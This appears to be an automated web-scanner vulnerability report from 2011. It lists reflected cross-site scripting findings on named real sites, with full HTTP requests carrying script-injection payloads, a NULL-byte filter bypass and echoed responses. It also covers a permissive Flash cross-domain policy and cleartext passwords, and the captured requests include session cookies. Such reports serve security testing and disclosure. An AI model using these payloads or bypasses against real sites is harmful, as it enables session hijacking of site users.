GET /puzzle-games HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%0087a19</script>8fdc2d67036
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b03fe</script><script>alert(1)</script>e7e18f9aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=b03fe</script><script>alert(1)</script>e7e18f9aee9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e93c</script>9a2837e5673 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /word-games?pageSection=footer_word HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=1e93c</script>9a2837e5673
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd5</script><script>alert(1)</script>67ec067b57f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /word-games?pageSection=categorybar_word HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: dffd5</script><script>alert(1)</script>67ec067b57f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 741b6</script><script>alert(1)</script>9348f64da1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/signin.do?pageSection=footer_login HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=741b6</script><script>alert(1)</script>9348f64da1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551d6</script><script>alert(1)</script>0c64aa9445a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/heavyregview.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=551d6</script><script>alert(1)</script>0c64aa9445a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 414b2</script><script>alert(1)</script>2dd15a3077d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_roomsel_text HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=414b2</script><script>alert(1)</script>2dd15a3077d Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ba1</script><script>alert(1)</script>912b9bb25ebc3f329 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39644</script><script>alert(1)</script>269a596ea9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f81c1'-alert(1)-'021d67a20b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 09 Jan 2011 02:54:03 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=f81c1'-alert(1)-'021d67a20b1'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f23e'-alert(1)-'f20e7420cb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 09 Jan 2011 05:28:05 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=4f23e'-alert(1)-'f20e7420cb7'; } </script> ...[SNIP]...
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbf"-alert(1)-"6ccf7185570 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=a5fbf"-alert(1)-"6ccf7185570; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:25:48 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:48 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106451; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294539948^1294539948; expires=Sun, 16-Jan-2011 02:25:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2395
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7a5"-alert(1)-"f5272ad3817 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca65a"%3balert(1)//bb0a3c82748 was submitted in the pl_lang cookie. This input was echoed as ca65a";alert(1)//bb0a3c82748 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=ca65a"%3balert(1)//bb0a3c82748; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- If ...[SNIP]... .peanutlabs.com/js/iFrame/stylesheet/custom/pogo/pogo_subscriptions.css"/>'); document.write(unescape("%3Cscript src='http://static.e00.peanutlabs.com/js/iFrame/iFrame-js.cssx?publisherId=3432&lang=ca65a";alert(1)//bb0a3c82748.UTF&ref=82' type='text/javascript'%3E%3C/script%3E")); </script> ...[SNIP]...
The value of the pl_lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ec9f"%3balert(1)//da7bb47d018 was submitted in the pl_lang cookie. This input was echoed as 2ec9f";alert(1)//da7bb47d018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /userGreeting.php HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=2ec9f"%3balert(1)//da7bb47d018; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
Request
GET /crossdomain.xml HTTP/1.1 Host: activity.livefaceonweb.com Proxy-Connection: keep-alive Referer: http://www.toprewardscentral.com/mindquiz_flv/lfow.swf?lfID=100002004&cOMW=0&cOMURL=http%3A//www.livefaceonweb.com&cOMWP=0&tDLB=0&tDLA=0&fIE=1&fIET=1&fIEP=1&fOE=1&fOET=1&pBBE=0&pBBBOF=0&pBAE=0&pBAOF=0&sFRAME=0&pBuffer=30&lfAffiliateID=2&sURL_Site=http%3A//www.theiq-quiz.com/hv1iqqz/MjAxMTAxMDgtMTczLjE5My4yMTQuMjQz/index.php%3Fweb_id%3DCD99%26exitpops%3D9175 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 18 Feb 2010 19:27:08 GMT Accept-Ranges: bytes ETag: "f019885cd0b0ca1:0" Server: Microsoft-IIS/7.0 Date: Sun, 09 Jan 2011 01:34:43 GMT Content-Length: 199
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
